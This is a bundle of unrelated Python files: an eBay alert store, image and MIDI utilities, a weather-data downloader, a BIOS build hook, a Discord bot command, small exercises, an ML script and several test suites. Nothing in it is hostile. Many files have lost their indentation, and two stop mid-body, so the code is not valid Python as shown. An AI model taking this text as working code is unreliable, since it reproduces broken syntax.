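# tornado.ioloop.IOLoop.instance().add_future(future, handle)
# tornado.ioloop.IOLoop.instance().start()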
|
import json
import os
import uuid
import pickle
from Alerts.Alert import Alert
from AlertsParameters.Categories.Category import Category
class AlertsDiskIO(object):
def __init__(self):
super().__init__()
home = os.path.expanduser("~")
self.alertsDirectory = os.path.join(home, "EbayAlertor")
self.alertPrefix = "alert_"
self.resultPrefix = "result_"
if not os.path.exists(self.alertsDirectory):
os.makedirs(self.alertsDirectory)
def getAlertsFromDisk(self):
alerts = []
for file in os.listdir(self.alertsDirectory):
fullFilename = os.path.join(self.alertsDirectory, file)
if os.path.isfile(fullFilename) and file.startswith(self.alertPrefix):
with open(fullFilename, "r") as fd:
alert = self.__tryCreateAlertFromFile(file, fd)
if alert:
alerts.append(alert)
return alerts
def deleteAlertInDisk(self, alert):
filename = os.path.join(self.alertsDirectory, self.alertPrefix + str(alert.uid))
if os.path.exists(filename) and os.path.isfile(filename):
os.remove(filename)
def __tryCreateAlertFromFile(self, filename, fd):
uid = uuid.UUID(filename[len(self.alertPrefix):])
        try:
            jsonContent = json.load(fd)
        except ValueError:  # json.JSONDecodeError is a subclass of ValueError
            print("Invalid alert file format ({})".format(filename))
            return None
keywords = jsonContent["keywords"]
categoriesJson = jsonContent["categories"]
location = jsonContent["location"]
sortOrder = jsonContent["sortOrder"]
categoriesList = []
for categoryJson in categoriesJson:
category = Category(categoryJson["name"],
categoryJson["id"],
categoryJson["level"])
categoriesList.append(category)
alert = Alert(keywords, categoriesList, location=location, uid=uid,
sortOrder=sortOrder)
return alert
def saveAlertToDisk(self, alert):
categoriesDict = []
for category in alert.categories:
d = {
"name": category.name,
"id": category.ID,
"level": category.level
}
categoriesDict.append(d)
        alertDict = {
            "keywords": alert.keywords,
            "location": alert.location,
            "categories": categoriesDict,
            "sortOrder": alert.sortOrder
        }
        jsonContent = json.dumps(alertDict)
filename = os.path.join(self.alertsDirectory, self.alertPrefix + str(alert.uid))
with open(filename, "w+") as fd:
fd.writelines(jsonContent)
|
import random
from typing import Tuple
from PIL import Image
def get_average_per_channel(img: Image.Image) -> Tuple[float, float, float]:
r, g, b = 0, 0, 0
area = img.width * img.height
for y in range(img.height):
for x in range(img.width):
pixel = img.getpixel((x, y))
r += pixel[0]
g += pixel[1]
b += pixel[2]
if not area:
area = 1
return (r / area, g / area, b / area)
def is_square(image: Image.Image) -> bool:
width, height = image.size
return height == width
def redim_image(img, max_dim=1500):
width, height = img.width, img.height
if not width > max_dim and not height > max_dim:
return img
if height > width:
hpercent = (max_dim / float(img.size[1]))
wsize = int((float(img.size[0]) * float(hpercent)))
        res = img.resize((wsize, max_dim), Image.LANCZOS)  # the ANTIALIAS alias was removed in Pillow 10
else:
wpercent = (max_dim/float(img.size[0]))
hsize = int((float(img.size[1]) * float(wpercent)))
        res = img.resize((max_dim, hsize), Image.LANCZOS)
return res
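# A quick self-contained check of the helpers above (solid red test image):
if __name__ == '__main__':
    img = Image.new('RGB', (4, 4), (255, 0, 0))
    print(get_average_per_channel(img))  # (255.0, 0.0, 0.0)
    print(is_square(img))                # True
    print(redim_image(img).size)         # (4, 4): already under max_dim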
|
# n is not required by this solution; it is read only to match the STDIN
# format expected by HackerRank.
def soln(n, scores):
    scores = sorted(set(scores))
    print(scores[-2])  # second-largest distinct score
if __name__ == "__main__":
n = int(input())
arr = map(int, input().split())
soln(n, arr)
|
from future.standard_library import install_aliases
install_aliases()
from urllib.request import urlopen
import os
import logging
import sys
data_dir = os.path.join(os.path.abspath(__file__ + '/../../../..'), 'data/raw/weather_wunderground')
logger = logging.getLogger(__name__)
# include your weather stations here by country, get the METARS site code from the station.txt file.
weather_stations_MY = ('WBGB','WBGG','WBGR','WBGS','WBGY','WBKK','WBKL','WBKS','WBKT','WBKW','WMAP','WMAU','WMBA','WMBT','WMKA','WMKB','WMKC','WMKD','WMKE','WMKF','WMKI','WMKJ','WMKK','WMKL','WMKM','WMKN','WMKP','WMPA','WMSA')
weather_stations_BN = ('WBSB',)  # trailing comma: a one-element tuple, not a string
weather_stations_SG = ('WSAP','WSAT','WSSL','WSSS')
weather_stations_ID = ('WAAA','WAAB','WAAP','WAAS','WAAU','WABB','WABI','WABN','WABO','WABT','WADA','WADD','WADL','WAJI','WAJJ','WAJW','WAKK','WAKT','WAMA','WAMG','WAMH','WAMI','WAML','WAMM','WAMN','WAMP','WAMR','WAMT','WAMW','WAPA','WAPH','WAPI','WAPN','WAPP','WAPR','WARR','WARS','WARQ','WASF','WASK','WASR','WASS','WIAA','WIAG','WIAM','WIAR','WIAS','WIBB','WIDD','WIHH','WIIA','WIIB','WIID','WIIH','WIII','WIIJ','WARJ','WIIK','WIIL','WIIS','WIIT','WIKB','WIKD','WIKK','WIDN','WIKN','WIKS','WIMB','WIMG','WIMM','WIMS','WIMT','WIOI','WIOK','WION','WIOO','WIOS','WIPA','WIPH','WIPK','WIPL','WIPP','WIPR','WIPT','WITA','WITC','WITM','WITT','WRBB','WAOO','WRBI','WRBK','WRBM','WRBP','WRKA','WRKC','WRKE','WRKK','WATT','WRKL','WRKM','WRKR','WRKS','WRLB','WRLG','WRLH','WRLK','WRLL','WALL','WALR','WRLR','WRLS','WRLU','WRRA','WRRB','WRRR','WRRS','WRRW','WRSJ','WRSP','WRSQ','WRSS')
weather_stations_PH = ('RPLB','RPLC','RPLI','RPLL','RPMD','RPMK','RPML','RPMP','RPMR','RPMS','RPMZ','RPUA','RPUB','RPUD','RPUH','RPUI','RPUK','RPUM','RPUN','RPUO','RPUQ','RPUR','RPUT','RPUV','RPUW','RPVA','RPVB','RPVC','RPVD','RPVF','RPVG','RPVI','RPVJ','RPVK','RPVM','RPVP','RPVR','RPVT','RPWB','RPWC','RPWE','RPWG','RPWI','RPWJ','RPWL','RPWM','RPWP','RPWS','RPWW','RPWX','RPWY','RPWZ','RPXC','RPXT','RPMT')
WEATHER_STATIONS = {
'MY': weather_stations_MY,
'BN': weather_stations_BN,
'ID': weather_stations_ID,
'PH': weather_stations_PH
}
def download():
    # change the countries you want to download meteorological data for here
    countries_to_download = ['PH', 'MY']
    for country in countries_to_download:
        for year in range(2010, 2016):
            for ws in WEATHER_STATIONS[country]:
logger.info(
"Downloading wunderground data for country %s, year %s and station %s",
country, year, ws
)
url = "https://www.wunderground.com/history/airport/{0}/{1}/1/1/CustomHistory.html?dayend=31&monthend=12&yearend={2}&format=1".format(ws, year, year)
country_data_dir = "{}/{}".format(data_dir, country)
# and here in the folder name
if sys.version_info < (3, 0):
try:
os.makedirs(country_data_dir)
except OSError as e:
pass
else:
os.makedirs(country_data_dir, exist_ok=True)
filename = os.path.join(country_data_dir, "{0}-{1}.csv".format(ws,year))
# response = urllib2.urlopen(url)
response = urlopen(url)
with open(filename,'wb') as output:
output.write(response.read())
|
from __future__ import annotations
import pytest
pytest.register_assert_rewrite("tests.mixology.helpers")
|
# @ build_board.py
# This adds additional build functions to build_bios.py
#
# Copyright (c) 2019, Intel Corporation. All rights reserved.<BR>
# SPDX-License-Identifier: BSD-2-Clause-Patent
#
"""
This module serves as an additional build steps for the Mt Olympus board
"""
import os
import sys
def pre_build_ex(config, functions):
"""Additional Pre BIOS build function
:param config: The environment variables to be used in the build process
:type config: Dictionary
:param functions: A dictionary of function pointers
:type functions: Dictionary
:returns: nothing
"""
print("Info: re-generating PlatformOffset header files")
execute_script = functions.get("execute_script")
command = ["build", "-D", "MAX_SOCKET=" + config.get("MAX_SOCKET", "1"),
"-m",
os.path.join(config["PLATFORM_BOARD_PACKAGE"],
"Acpi", "BoardAcpiDxe", "Dsdt.inf"),
"-y",
config.get("PRE_BUILD_REPORT",
os.path.join(config["WORKSPACE"],
"preBuildReport.txt")),
"--log=" + config.get("PRE_BUILD_LOG",
os.path.join(config["WORKSPACE"],
"prebuild.log"))]
_, _, _, code = execute_script(command, config)
if code != 0:
print(" ".join(command))
print("Error re-generating PlatformOffset header files")
sys.exit(1)
config["AML_FILTER"] = "\"PSYS\" .MCTL\" .FIX[0-9,A-Z]\""
print("AML_FILTER= ", config.get("AML_FILTER"))
# build the command with arguments
command = ["python",
os.path.join(config["MIN_PACKAGE_TOOLS"],
"AmlGenOffset",
"AmlGenOffset.py"),
"-d", "--aml_filter", config["AML_FILTER"],
"-o", os.path.join(config["WORKSPACE_PLATFORM"],
config["PLATFORM_BOARD_PACKAGE"],
"Acpi", "BoardAcpiDxe",
"AmlOffsetTable.c"),
os.path.join(config["BUILD_X64"],
"PurleyOpenBoardPkg",
"Acpi",
"BoardAcpiDxe",
"Dsdt",
"OUTPUT",
"Dsdt", "WFPPlatform.offset.h")]
# execute the command
_, _, _, code = execute_script(command, config)
if code != 0:
print(" ".join(command))
print("Error re-generating PlatformOffset header files")
sys.exit(1)
print("GenOffset done")
return config
def build_ex(config, functions):
"""Additional BIOS build function
:param config: The environment variables to be used in
the build process
:type config: Dictionary
:param functions: A dictionary of function pointers
:type functions: Dictionary
:returns: config dictionary
:rtype: Dictionary
"""
print("build_ex")
return None
def post_build_ex(config, functions):
"""Additional Post BIOS build function
:param config: The environment variables to be used in the post
build process
:type config: Dictionary
:param functions: A dictionary of function pointers
:type functions: Dictionary
:returns: config dictionary
:rtype: Dictionary
"""
print("post_build_ex")
execute_script = functions.get("execute_script")
if not execute_script:
print("post_build_ex Error")
sys.exit(1)
common_patch_command = [os.path.join(config["PYTHON_HOME"], "python"),
os.path.join(config["MIN_PACKAGE_TOOLS"],
"PatchFv", "PatchBinFv.py"),
config["TARGET"],
os.path.join(config["WORKSPACE_SILICON_BIN"],
"PurleySiliconBinPkg"),
os.path.join(config["WORKSPACE"],
"BuildReport.log")]
fvs_to_patch = ["FvTempMemorySilicon",
"FvPreMemorySilicon",
"FvPostMemorySilicon",
"FvLateSilicon"]
for fv in fvs_to_patch:
patch_command = common_patch_command + [fv]
_, _, _, code = execute_script(patch_command, config)
if code != 0:
print(" ".join(patch_command))
print("Patch Error!")
sys.exit(1)
common_rebase_command = [os.path.join(config["PYTHON_HOME"], "python"),
os.path.join(config["MIN_PACKAGE_TOOLS"],
"PatchFv", "RebaseBinFv.py"),
config["TARGET"],
os.path.join(config["WORKSPACE_SILICON_BIN"],
"PurleySiliconBinPkg"),
os.path.join(config["WORKSPACE"],
"BuildReport.log")]
rebase_command = common_rebase_command +\
["FvPreMemorySilicon",
"gMinPlatformPkgTokenSpaceGuid.PcdFlashFvFspMBase"]
_, _, _, code = execute_script(rebase_command, config)
if code != 0:
print(" ".join(rebase_command))
print("Patch Error!")
sys.exit(1)
rebase_command = common_rebase_command +\
["FvPostMemorySilicon",
"gMinPlatformPkgTokenSpaceGuid.PcdFlashFvFspSBase"]
_, _, _, code = execute_script(rebase_command, config)
if code != 0:
print(" ".join(rebase_command))
print("Patch Error!")
sys.exit(1)
return None
def clean_ex(config, functions):
"""Additional clean function
:param config: The environment variables to be used in the build process
:type config: Dictionary
:param functions: A dictionary of function pointers
:type functions: Dictionary
:returns: config dictionary
:rtype: Dictionary
"""
print("clean_ex")
return None
|
import forumsweats.discordbot as discordbot
from ..commandparser import Member
import discord
from forumsweats import db
name = 'duelstreak'
aliases = ('duel-streak', 'duelwinstreak', 'duel-winstreak', 'duelwin-streak', 'duel-win-streak')
args = '[member]'
async def run(message, member: Member = None):
'Tells you your current duel winstreak in #general'
if not member:
member = message.author
winstreak = await db.fetch_duel_winstreak(member.id)
if member.id == message.author.id:
winstreak_message = f'Your duel winstreak is **{winstreak}**'
else:
winstreak_message = f'<@{member.id}> has a duel winstreak of **{winstreak}**'
embed = discord.Embed(
description=winstreak_message
)
await message.channel.send(embed=embed)
|
import multiprocessing
import sys
import mido
import pretty_midi
import numpy as np
import collections
from joblib import Parallel, delayed
from mir_eval.util import hz_to_midi
from tqdm import tqdm
def parse_midi(path):
    """open midi file and return np.array of (onset, offset, note, velocity) rows"""
    print("Parsing midi")
    midi = mido.MidiFile(path)
    print(path)
time = 0
sustain = False
events = []
for message in midi:
time += message.time
if message.type == 'control_change' and message.control == 64 and (message.value >= 64) != sustain:
# sustain pedal state has just changed
sustain = message.value >= 64
event_type = 'sustain_on' if sustain else 'sustain_off'
event = dict(index=len(events), time=time, type=event_type, note=None, velocity=0)
events.append(event)
if 'note' in message.type:
# MIDI offsets can be either 'note_off' events or 'note_on' with zero velocity
velocity = message.velocity if message.type == 'note_on' else 0
event = dict(index=len(events), time=time, type='note', note=message.note, velocity=velocity, sustain=sustain)
events.append(event)
notes = []
for i, onset in enumerate(events):
if onset['velocity'] == 0:
continue
# find the next note_off message
offset = next(n for n in events[i + 1:] if n['note'] == onset['note'] or n is events[-1])
if offset['sustain'] and offset is not events[-1]:
# if the sustain pedal is active at offset, find when the sustain ends
offset = next(n for n in events[offset['index'] + 1:] if n['type'] == 'sustain_off' or n is events[-1])
note = (onset['time'], offset['time'], onset['note'], onset['velocity'])
notes.append(note)
return np.array(notes)
def save_midi(path, pitches, intervals, velocities):
"""
Save extracted notes as a MIDI file
Parameters
----------
path: the path to save the MIDI file
pitches: np.ndarray of bin_indices
intervals: list of (onset_index, offset_index)
velocities: list of velocity values
"""
file = pretty_midi.PrettyMIDI()
piano_program = pretty_midi.instrument_name_to_program('Acoustic Grand Piano')
piano = pretty_midi.Instrument(program=piano_program)
    # Remove overlapping intervals (each end time must be less than or equal to the start time of the next note on the same pitch)
intervals_dict = collections.defaultdict(list)
for i in range(len(pitches)):
pitch = int(round(hz_to_midi(pitches[i])))
intervals_dict[pitch].append((intervals[i], i))
for pitch in intervals_dict:
interval_list = intervals_dict[pitch]
interval_list.sort(key=lambda x: x[0][0])
for i in range(len(interval_list) - 1):
# assert interval_list[i][1] <= interval_list[i+1][0], f'End time should be smaller of equal start time of next note on the same pitch. It was {interval_list[i][1]}, {interval_list[i+1][0]} for pitch {key}'
interval_list[i][0][1] = min(interval_list[i][0][1], interval_list[i+1][0][0])
for pitch in intervals_dict:
interval_list = intervals_dict[pitch]
for interval,i in interval_list:
pitch = int(round(hz_to_midi(pitches[i])))
velocity = int(127*min(velocities[i], 1))
note = pretty_midi.Note(velocity=velocity, pitch=pitch, start=interval[0], end=interval[1])
piano.notes.append(note)
file.instruments.append(piano)
file.write(path)
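# A usage sketch (example values assumed): write two slightly overlapping A4
# notes. Intervals must be mutable [onset, offset] pairs because overlaps are
# truncated in place above.
# save_midi('example.mid', pitches=[440.0, 440.0],
#           intervals=[[0.0, 0.6], [0.5, 1.0]], velocities=[0.8, 0.9])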
if __name__ == '__main__':
def process(input_file, output_file):
midi_data = parse_midi(input_file)
np.savetxt(output_file, midi_data, '%.6f', '\t', header='onset\toffset\tnote\tvelocity')
def files():
for input_file in tqdm(sys.argv[1:]):
if input_file.endswith('.mid'):
output_file = input_file[:-4] + '.tsv'
elif input_file.endswith('.midi'):
output_file = input_file[:-5] + '.tsv'
else:
print('ignoring non-MIDI file %s' % input_file, file=sys.stderr)
continue
yield (input_file, output_file)
Parallel(n_jobs=multiprocessing.cpu_count())(delayed(process)(in_file, out_file) for in_file, out_file in files())
|
import pandas as pd
import numpy as np
import os
import random
import warnings
warnings.simplefilter('ignore')
from sklearn.preprocessing import LabelEncoder, StandardScaler
from sklearn.model_selection import train_test_split, KFold, StratifiedKFold
import lightgbm as lgb
TARGET = 'Survived'
N_ESTIMATORS = 1000
N_SPLITS = 10
SEED = 2021
EARLY_STOPPING_ROUNDS = 100
VERBOSE = 100
def set_seed(seed=42):
random.seed(seed)
os.environ['PYTHONHASHSEED'] = str(seed)
np.random.seed(seed)
set_seed(SEED)
root_path = "./"
train = pd.read_csv(os.path.join(root_path, 'train.csv'))
# y = train['Survived']
# train = train.drop(['Survived'],1)
test = pd.read_csv(os.path.join(root_path, 'test.csv'))
dataset = pd.concat([train, test], axis = 0, ignore_index = True)
# train_len = len(train)
# dataset = dataset.drop(['PassengerId'], 1)
# print('*********Whole Dataset*********\n', dataset.head())
dataset['Age'] = dataset['Age'].fillna(dataset['Age'].mean())
dataset['Cabin'] = dataset['Cabin'].fillna('X').map(lambda x: x[0].strip())
dataset['Ticket'] = dataset['Ticket'].fillna('X').map(lambda x:str(x).split()[0] if len(str(x).split()) > 1 else 'X')
fare_map = dataset[['Fare', 'Pclass']].dropna().groupby('Pclass').median().to_dict()
dataset['Fare'] = dataset['Fare'].fillna(dataset['Pclass'].map(fare_map['Fare']))
dataset['Fare'] = np.log1p(dataset['Fare'])
dataset['Embarked'] = dataset['Embarked'].fillna('X')
dataset['Name'] = dataset['Name'].map(lambda x: x.split(',')[0])
# print('*********Whole Dataset*********\n', dataset.head())
label_cols = ['Name', 'Ticket', 'Sex']
onehot_cols = ['Cabin', 'Embarked']
numerical_cols = ['Pclass', 'Age', 'SibSp', 'Parch', 'Fare']
def label_encoder(c):
le = LabelEncoder()
return le.fit_transform(c)
scaler = StandardScaler()
onehot_encoded_df = pd.get_dummies(dataset[onehot_cols])
label_encoded_df = dataset[label_cols].apply(label_encoder)
numerical_df = pd.DataFrame(scaler.fit_transform(dataset[numerical_cols]), columns=numerical_cols)
target_df = dataset[TARGET]
dataset = pd.concat([numerical_df, label_encoded_df, onehot_encoded_df, target_df], axis=1)
# print('*********Whole Dataset*********\n', dataset.head())
# Light GBM
params = {
'metric': 'binary_logloss',
'n_estimators': N_ESTIMATORS,
'objective': 'binary',
'random_state': SEED,
'learning_rate': 0.01,
'min_child_samples': 150,
'reg_alpha': 3e-5,
'reg_lambda': 9e-2,
'num_leaves': 20,
'max_depth': 16,
'colsample_bytree': 0.8,
'subsample': 0.8,
'subsample_freq': 2,
'max_bin': 240,
}
lgb_oof = np.zeros(train.shape[0])
lgb_preds = np.zeros(test.shape[0])
feature_importances = pd.DataFrame()
skf = StratifiedKFold(n_splits=N_SPLITS, shuffle=True, random_state=SEED)
for fold, (train_idx, valid_idx) in enumerate(skf.split(dataset, dataset[TARGET])):
print(f"===== FOLD {fold} =====")
|
from deidentify.base import Annotation, Document
from deidentify.taggers import CRFTagger
from deidentify.tokenizer import TokenizerFactory
tokenizer = TokenizerFactory().tokenizer(corpus='ons')
tagger = CRFTagger(model='model_crf_ons_tuned-v0.2.0', tokenizer=tokenizer)
def test_annotate():
doc = Document(
name='',
text='Hij werd op 10 oktober door arts Peter de Visser ontslagen van de kliniek.', annotations=[]
)
anns = tagger.annotate([doc])[0].annotations
assert anns == [
Annotation(text='10 oktober', start=12, end=22, tag='Date', doc_id='', ann_id='T0'),
Annotation(text='Peter de Visser', start=33, end=48, tag='Name', doc_id='', ann_id='T1')
]
def test_tags():
expected = [
'SSN',
'Organization_Company',
'Date',
'ID',
'Internal_Location',
'Care_Institute',
'Age',
'Phone_fax',
'Name',
'Profession',
'Hospital',
'Other',
'Initials',
'Address',
'Email',
'URL_IP'
]
assert sorted(tagger.tags) == sorted(expected)
|
# -*- encoding: utf-8 -*-
import shared as s
import utils as u
def AritMenu():
    u.LogoType(s.LogoPath)
    print("1 - Addition")
    print("2 - Subtraction")
    print("3 - Multiplication")
    print("4 - Division")
    print("x - Back")
    Opt = u.getch()
    if Opt == 'x': return 0
    u.clear()
    print("<'exit' to quit>")
    if Opt == '4': print("<Precision of "+str(s.FloatPrec)+" decimal place(s)>")
while 1:
if s.RCount == 0:
            Signal = Arit(Opt) # Capture the return value of the 'Arit' function
            if Signal == 'exit':
                return 0 # If the value is 'exit', quit
else:
List = []
for Count in range(s.RCount):
List.insert(Count,Arit(Opt))
print("-- Concluido --")
for i in range(s.RCount):
print(str((i+1))+" - "+List[i])
u.getch()
return 0
def Arit(Opt):
x = u.randint(s.IntMin,s.IntMax)
y = u.randint(s.IntMin,s.IntMax)
if Opt == '1': r = input(str(x)+" + "+str(y)+" = ") ; rs = x+y
elif Opt == '2': r = input(str(x)+" - "+str(y)+" = ") ; rs = x-y
elif Opt == '3': r = input(str(x)+" x "+str(y)+" = ") ; rs = x*y
    elif Opt == '4':
        while y == 0: # avoid division by zero (the original try/except did not prevent it)
            y = u.randint(s.IntMin,s.IntMax)
        r = input(str(x)+" / "+str(y)+" = ")
        rs = round((x/y),s.FloatPrec)
return u.CheckAnswer(rs,r)
|
import os
import itertools
from concurrent.futures import ProcessPoolExecutor
from functools import partial
from tqdm import trange
import numpy as np
from scipy.misc import imread, imresize  # note: removed in SciPy >= 1.3; this script targets older SciPy
from util import audio
def __load_and_save_images(category, config):
category_input_base_dir = os.path.join(config.base_dir, config.input, 'imgs', str(category))
index = 0
image_limit = config.imgs
for path, _, filenames in os.walk(category_input_base_dir):
for file in filenames:
if image_limit != -1 and index >= image_limit:
break
image_path = os.path.join(category_input_base_dir, file)
raw_image = imread(image_path, mode='RGB')
# Pre-process image
preprocessed_image = imresize(raw_image, (224, 224, 3))
# Write image to disk
preprocessed_image_filename = '{}bird{}.npy'.format(category, index)
np.save(os.path.join(config.base_dir, config.output, preprocessed_image_filename), preprocessed_image,
allow_pickle=False)
index += 1
return index
def __preprocess_audio(category, config):
category_input_base_dir = os.path.join(config.base_dir, config.input, 'wavs', str(category))
out_dir = os.path.join(config.base_dir, config.output)
index = 0
audio_limit = config.wavs
for path, _, filenames in os.walk(category_input_base_dir):
for file in filenames:
if audio_limit != -1 and index >= audio_limit:
break
__generate_spectrograms(os.path.join(category_input_base_dir, file), category, index, out_dir)
index += 1
return index
def __generate_spectrograms(file_path, category, index, out_dir):
wav = audio.load_wav(file_path)
# Compute the linear-scale spectrogram from the wav:
spectrogram = audio.spectrogram(wav).astype(np.float32)
# Compute a mel-scale spectrogram from the wav:
mel_spectrogram = audio.melspectrogram(wav).astype(np.float32)
# Write the spectrograms to disk:
spectrogram_filename = '{}spec{}.npy'.format(category, index)
mel_filename = '{}mel{}.npy'.format(category, index)
np.save(os.path.join(out_dir, spectrogram_filename), spectrogram.T, allow_pickle=False)
np.save(os.path.join(out_dir, mel_filename), mel_spectrogram.T, allow_pickle=False)
def __generate_metadata(category, image_count, audio_count):
meta_data = []
for image_index, audio_index in itertools.product(range(image_count), range(audio_count)):
image_file_name = '{}bird{}.npy'.format(category, image_index)
spec_file_name = '{}spec{}.npy'.format(category, audio_index)
mel_file_name = '{}mel{}.npy'.format(category, audio_index)
meta_data.append('{}|{}|{}\n'.format(spec_file_name, mel_file_name, image_file_name))
return meta_data
def __preprocess_in_parallel(category, config):
image_count = __load_and_save_images(category, config)
audio_count = __preprocess_audio(category, config)
return __generate_metadata(category, image_count, audio_count)
def build(config):
executor = ProcessPoolExecutor(max_workers=config.num_workers)
meta_data = []
for category in trange(config.categories, desc='# Category progress'):
meta_data += executor.submit(partial(__preprocess_in_parallel, category, config)).result()
return meta_data
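# A usage sketch (hypothetical config namespace; attribute names inferred from
# the accesses above):
# from argparse import Namespace
# config = Namespace(base_dir='.', input='raw', output='training',
#                    imgs=-1, wavs=-1, categories=10, num_workers=4)
# metadata = build(config)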
|
def is_divisible(n):
for divisor in range(2, 21):
if n % divisor != 0:
return False
return True
number = 1
while not is_divisible(number):
number += 1
print(number)
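# The brute-force search above is correct but slow; as a sketch, the same
# answer follows from a closed form (math.lcm is variadic on Python 3.9+):
import math
print(math.lcm(*range(2, 21)))  # 232792560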
|
# Example 5
def main():
# Create a dictionary with student IDs as the keys
# and student data stored in a list as the values.
students = {
"42-039-4736": ["Clint", "Huish", "hui20001@byui.edu", 16],
"61-315-0160": ["Michelle", "Davis", "dav21012@byui.edu", 3],
"10-450-1203": ["Jorge", "Soares", "soa22005@byui.edu", 15],
"75-421-2310": ["Abdul", "Ali", "ali20003@byui.edu", 5],
"07-103-5621": ["Michelle", "Davis", "dav19008@byui.edu", 0],
"81-298-9238": ["Sama", "Patel", "pat21004@byui.edu", 8]
}
# These are the indexes of the elements in the value lists.
GIVEN_NAME_INDEX = 0
SURNAME_INDEX = 1
EMAIL_INDEX = 2
CREDITS_INDEX = 3
total = 0
# For each item in the list add the number
# of credits that the student has earned.
    # This is the first example:
#for item in students.items():
#key = item[0]
#value = item[1]
# Retrieve the number of credits from the value list.
#credits = value[CREDITS_INDEX]
# Add the number of credits to the total.
#total += credits
#print(f"Total credits earned by all students: {total}")
    # The second example is simpler; we can do the same thing like this:
    for key, value in students.items():
# Retrieve the number of credits from the value list.
credits = value[CREDITS_INDEX]
# Add the number of credits to the total.
total += credits
print(f"Total credits earned by all students: {total}")
# Call main to start this program.
if __name__ == "__main__":
main()
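# As a sketch, the same total can be computed in one line with a generator
# expression (students and CREDITS_INDEX are local to main above):
# total = sum(data[CREDITS_INDEX] for data in students.values())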
|
import boto3
import mock
import pytest
import requests
import yaml
from botocore.stub import Stubber
from datetime import datetime
from dateutil.tz import tzutc
from freezegun import freeze_time
from io import StringIO
from app import (
create_hostedgraphite_base_metrics,
format_cloudwatch_metric_datapoint_for_hostedgraphite,
format_config_metric_entry_for_hostedgraphite_base_metric,
get_config,
get_metric_from_cloudwatch,
send_to_hostedgraphite
)
from .fixtures import config
class TestApp:
def setup_method(self):
# Mock out boto3 cloudwatch client
self.client = boto3.client('cloudwatch', region_name="eu-west-1")
self.stubber = Stubber(self.client)
self.stubber.activate()
# Mock out send_to_hostedgraphite method
self.send_to_hostedgraphite_mock = mock.patch('app.send_to_hostedgraphite')
self.send_to_hostedgraphite_mock.start()
def teardown_method(self):
self.send_to_hostedgraphite_mock.stop()
self.stubber.deactivate()
class TestGetConfig(TestApp):
def test_get_config_with_valid_yaml(self):
fake_config = StringIO("""Metrics:
- Namespace: "DM-RequestTimeBuckets"
MetricName: "preview-antivirus-api-request-times-0"
Statistics: "Sum"
Dimensions: {}
Options:
Formatter: 'cloudwatch.request_time_buckets.preview.antivirus-api.request_time_bucket_0.%(statistic)s'
- Namespace: "DM-RequestTimeBuckets"
MetricName: "preview-antivirus-api-request-times-1"
Statistics: "Sum"
Dimensions: {}
Options:
Formatter: 'cloudwatch.request_time_buckets.preview.antivirus-api.request_time_bucket_1.%(statistic)s'
""")
with mock.patch('app.open', return_value=fake_config):
config_dict = get_config()
assert config_dict == {
'Metrics':
[
{
'Namespace': 'DM-RequestTimeBuckets',
'MetricName': 'preview-antivirus-api-request-times-0',
'Statistics': 'Sum',
'Dimensions': {},
'Options': {
'Formatter': 'cloudwatch.request_time_buckets.preview.antivirus-api.'
'request_time_bucket_0.%(statistic)s'
}
},
{
'Namespace': 'DM-RequestTimeBuckets',
'MetricName': 'preview-antivirus-api-request-times-1',
'Statistics': 'Sum',
'Dimensions': {},
'Options': {
'Formatter': 'cloudwatch.request_time_buckets.preview.antivirus-api.'
'request_time_bucket_1.%(statistic)s'
}
}
]
}
def test_get_config_with_invalid_yaml(self):
fake_config = StringIO("""}I am not valid yaml!""")
with mock.patch('app.open', return_value=fake_config), pytest.raises(yaml.YAMLError):
get_config()
class TestSendToHostedGraphite(TestApp):
@mock.patch('app.os.getenv', return_value='our_env_value')
@mock.patch('app.requests.put', return_value=mock.Mock(status_code=200))
def test_send_to_hostedgraphite(self, put, getenv):
send_to_hostedgraphite('Some data')
        getenv.assert_called_once_with('HOSTED_GRAPHITE_API_KEY')
        put.assert_called_once_with(
            "http://www.hostedgraphite.com/api/v1/sink",
            auth=('our_env_value', ''),
            data='Some data'
        )
@mock.patch('app.logger')
@mock.patch('app.os.getenv')
@mock.patch('app.requests.put', return_value=mock.Mock(status_code=200))
def test_send_to_hostedgraphite_success_logging(self, put, getenv, logger):
send_to_hostedgraphite('Some data')
        logger.info.assert_called_once_with("Metrics sent to hosted graphite - Status code 200")
@mock.patch('app.logger')
@mock.patch('app.os.getenv')
@mock.patch('app.requests.put', return_value=mock.Mock(spec=requests.Response, status_code=404, reason='Not Found'))
def test_send_to_hostedgraphite_failure_logging(self, put, getenv, logger):
send_to_hostedgraphite('Some data')
        logger.warning.assert_called_once_with("Error sending metrics to hosted graphite - 404: Not Found")
@mock.patch('app.os.getenv')
@mock.patch('app.requests.put', side_effect=requests.ConnectionError('Timeout'))
def test_send_to_hostedgraphite_failure(self, put, getenv):
with pytest.raises(requests.ConnectionError):
send_to_hostedgraphite('Some data')
class TestFormatCloudwatchMetricDatapointForHostedgraphite(TestApp):
def test_format_cloudwatch_metric_datapoint_for_hostedgraphite(self):
config_entry = {
'Namespace': 'DM-RequestTimeBuckets',
'MetricName': 'preview-antivirus-api-request-times-0',
'Statistics': 'Sum',
'Dimensions': {},
'Options': {
'Formatter': 'cloudwatch.request_time_buckets.preview.antivirus-api.request_time_bucket_0.%(statistic)s'
}
}
metric_datapoint = {'Timestamp': datetime(2018, 9, 20, 14, 18, tzinfo=tzutc()), 'Sum': 1.0, 'Unit': 'None'}
expected_result = (
'cloudwatch.request_time_buckets.preview.antivirus-api.request_time_bucket_0.sum 1.0 1537453080'
)
assert format_cloudwatch_metric_datapoint_for_hostedgraphite(config_entry, metric_datapoint) == expected_result
class TestFormatConfigMetricEntryForHostedgraphiteBaseMetric(TestApp):
def test_format_config_metric_entry_for_hostedgraphite_base_metric(self):
config_entry = {
'Namespace': 'DM-RequestTimeBuckets',
'MetricName': 'preview-antivirus-api-request-times-0',
'Statistics': 'Sum',
'Dimensions': {},
'Options': {
'Formatter': 'cloudwatch.request_time_buckets.preview.antivirus-api.request_time_bucket_0.%(statistic)s'
}
}
timestamp = 1234567890
assert (
format_config_metric_entry_for_hostedgraphite_base_metric(config_entry, timestamp) ==
'cloudwatch.request_time_buckets.preview.antivirus-api.request_time_bucket_0.sum 0.0 1234567890'
)
class TestCreateHostedgraphiteBaseMetric(TestApp):
@freeze_time("2018-09-21 16:00:00")
def test_create_hostedgraphite_base_metrics(self):
base_metrics = create_hostedgraphite_base_metrics(config)
assert base_metrics == [
'cloudwatch.request_time_buckets.preview.antivirus-api.request_time_bucket_0.sum 0.0 1537113600',
'cloudwatch.application_500s.preview.api.500s.sum 0.0 1537113600',
